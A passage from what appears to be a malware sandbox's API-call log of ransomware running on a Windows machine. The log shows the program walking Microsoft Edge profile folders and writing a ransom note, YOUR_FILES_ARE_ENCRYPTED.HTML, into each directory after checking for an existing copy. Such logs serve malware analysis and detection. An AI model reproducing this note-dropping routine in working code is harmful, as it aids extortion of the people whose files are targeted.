ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1336, dwReserved1=0x6f1228, cFileName="..", cAlternateFileName="")) returned 1 [0116.324] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19cf4c | out: lpFindFileData=0x19cf4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1336, dwReserved1=0x6f1228, cFileName="nouser1", cAlternateFileName="")) returned 1 [0116.324] StrStrIW (lpFirst="nouser1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.324] wnsprintfW (in: pszDest=0x6a0358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1") returned 147 [0116.324] GetProcessHeap () returned 0x600000 [0116.324] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0116.325] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1" [0116.325] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\*" [0116.325] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\*", lpFindFileData=0x19cc38 | out: lpFindFileData=0x19cc38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f1230, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0116.326] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19cc38 | out: lpFindFileData=0x19cc38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f1230, cFileName="..", cAlternateFileName="")) returned 1 [0116.326] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19cc38 | out: lpFindFileData=0x19cc38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f1230, cFileName="120712-0049", cAlternateFileName="120712~1")) returned 1 [0116.326] StrStrIW (lpFirst="120712-0049", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.326] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049") returned 159 [0116.326] GetProcessHeap () returned 0x600000 [0116.326] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30b0050 [0116.326] lstrcpyW (in: lpString1=0x30b0050, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049" [0116.326] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049\\*" [0116.326] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049\\*", lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4338, dwReserved1=0x6b4210, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.327] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4338, dwReserved1=0x6b4210, cFileName="..", cAlternateFileName="")) returned 1 [0116.327] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19c924 | out: lpFindFileData=0x19c924*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4338, dwReserved1=0x6b4210, cFileName="..", cAlternateFileName="")) returned 0 [0116.327] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.327] wnsprintfW (in: pszDest=0x30b0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 189 [0116.327] GetProcessHeap () returned 0x600000 [0116.327] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.327] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\120712-0049\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\indexed\\data\\nouser1\\120712-0049\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0116.327] WriteFile (in: hFile=0x310, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19cbf0, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19cbf0*=0x3c00, lpOverlapped=0x0) returned 1 [0116.328] CloseHandle (hObject=0x310) returned 1 [0116.328] GetProcessHeap () returned 0x600000 [0116.328] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.328] GetProcessHeap () returned 0x600000 [0116.328] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30b0050 | out: hHeap=0x600000) returned 1 [0116.328] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19cc38 | out: lpFindFileData=0x19cc38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f1230, cFileName="120712-0049", cAlternateFileName="120712~1")) returned 0 [0116.328] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0116.328] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 177 [0116.329] GetProcessHeap () returned 0x600000 [0116.329] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\nouser1\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\indexed\\data\\nouser1\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0116.329] WriteFile (in: hFile=0x334, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19cf04, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19cf04*=0x3c00, lpOverlapped=0x0) returned 1 [0116.338] CloseHandle (hObject=0x334) returned 1 [0116.338] GetProcessHeap () returned 0x600000 [0116.338] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.338] GetProcessHeap () returned 0x600000 [0116.338] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0116.339] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19cf4c | out: lpFindFileData=0x19cf4c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1336, dwReserved1=0x6f1228, cFileName="nouser1", cAlternateFileName="")) returned 0 [0116.339] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0116.339] wnsprintfW (in: pszDest=0x6a0358, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 169 [0116.339] GetProcessHeap () returned 0x600000 [0116.339] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\indexed\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0116.339] WriteFile (in: hFile=0x328, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d218, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d218*=0x3c00, lpOverlapped=0x0) returned 1 [0116.345] CloseHandle (hObject=0x328) returned 1 [0116.345] GetProcessHeap () returned 0x600000 [0116.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.345] GetProcessHeap () returned 0x600000 [0116.345] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a0358 | out: hHeap=0x600000) returned 1 [0116.347] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x6f5c30, cFileName="Data", cAlternateFileName="")) returned 0 [0116.347] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0116.347] wnsprintfW (in: pszDest=0x690350, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 164 [0116.347] GetProcessHeap () returned 0x600000 [0116.347] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\Indexed\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\indexed\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0116.356] WriteFile (in: hFile=0x308, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d52c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d52c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.357] CloseHandle (hObject=0x308) returned 1 [0116.358] GetProcessHeap () returned 0x600000 [0116.358] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.358] GetProcessHeap () returned 0x600000 [0116.358] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x690350 | out: hHeap=0x600000) returned 1 [0116.358] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42eb1a2, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x42eb1a2, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x42eb1a2, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="Indexed", cAlternateFileName="")) returned 0 [0116.358] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.358] wnsprintfW (in: pszDest=0x680348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 156 [0116.358] GetProcessHeap () returned 0x600000 [0116.358] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.358] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DataStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\datastore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0116.359] WriteFile (in: hFile=0x338, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0116.360] CloseHandle (hObject=0x338) returned 1 [0116.360] GetProcessHeap () returned 0x600000 [0116.360] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.360] GetProcessHeap () returned 0x600000 [0116.360] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x680348 | out: hHeap=0x600000) returned 1 [0116.361] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4c9ab4f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4c9ab4f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4c9ab4f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f910, dwReserved1=0x25000025, cFileName="DownloadHistory", cAlternateFileName="DOWNLO~1")) returned 1 [0116.361] StrStrIW (lpFirst="DownloadHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.361] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory") returned 132 [0116.361] GetProcessHeap () returned 0x600000 [0116.361] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x32c81a0 [0116.362] lstrcpyW (in: lpString1=0x32c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory" [0116.362] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory\\*" [0116.362] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4c9ab4f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4c9ab4f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4c9ab4f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.363] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4c9ab4f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4c9ab4f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4c9ab4f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="..", cAlternateFileName="")) returned 1 [0116.363] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x4c9ab4f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4c9ab4f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4c9ab4f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="..", cAlternateFileName="")) returned 0 [0116.363] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.363] wnsprintfW (in: pszDest=0x32c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 162 [0116.363] GetProcessHeap () returned 0x600000 [0116.363] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\DownloadHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\downloadhistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0116.364] WriteFile (in: hFile=0x338, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0116.365] CloseHandle (hObject=0x338) returned 1 [0116.365] GetProcessHeap () returned 0x600000 [0116.365] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.365] GetProcessHeap () returned 0x600000 [0116.365] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0116.365] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x471725d, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x471725d, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x471725d, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f910, dwReserved1=0x25000025, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0116.365] StrStrIW 